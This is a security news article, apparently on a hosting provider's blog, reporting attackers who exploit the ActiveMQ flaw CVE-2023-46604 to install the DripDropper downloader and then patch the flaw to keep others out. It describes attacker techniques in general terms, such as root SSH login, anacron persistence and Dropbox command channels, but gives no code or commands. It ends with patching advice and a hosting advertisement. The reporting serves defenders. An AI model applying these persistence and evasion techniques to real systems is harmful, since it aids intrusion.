Threat actors have been taking advantage of a significant security vulnerability in Apache ActiveMQ, which has been around for nearly two years. This flaw allows them to sustain access to cloud-based Linux systems and deploy malware known as DripDropper.
Interestingly, after gaining initial access, these attackers have been seen proactively patching the vulnerability to prevent further exploitation by other adversaries, thus reducing the chances of detection, according to a report by Red Canary.
The attacks utilize a critical remote code execution vulnerability (CVE-2023-46604) in Apache ActiveMQ, rated with a maximum CVSS score of 10.0. This vulnerability, which allows arbitrary shell commands to be executed, was patched in October 2023.
Following the exploitation, the attackers modified existing SSH configurations to permit root login, allowing them to drop a previously unknown downloader named DripDropper on compromised systems. This malware, packaged as a PyInstaller Executable and Linkable Format (ELF) binary, requires a password to run, aiming to evade analysis. Additionally, it communicates with a Dropbox account controlled by the attackers, underscoring how they are increasingly using legitimate services to blend in with normal network activities.
DripDropper ultimately acts as a channel for dropping two files. The first enables various actions on different endpoints, from process monitoring to fulfilling commands received via Dropbox. The persistence of the dropped files is ensured by altering the anacron file located in various cron directories to maintain continued access.
The second file also connects to Dropbox for command execution and modifies SSH configuration files to establish backup access methods. Notably, the attackers have been seen downloading patches for CVE-2023-46604, effectively closing the vulnerability while maintaining their operations through other persistence methods.
Although uncommon, this tactic has been previously documented. Just last month, France’s cybersecurity agency highlighted a similar strategy used by a Chinese initial access broker to secure ongoing access by patching flaws to avoid detection by others.
This incident serves as a reminder for organizations to promptly apply security patches, restrict access to internal services by configuring ingress rules for trusted IPs or VPNs, and actively monitor logs in cloud environments to identify unusual activities.
Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.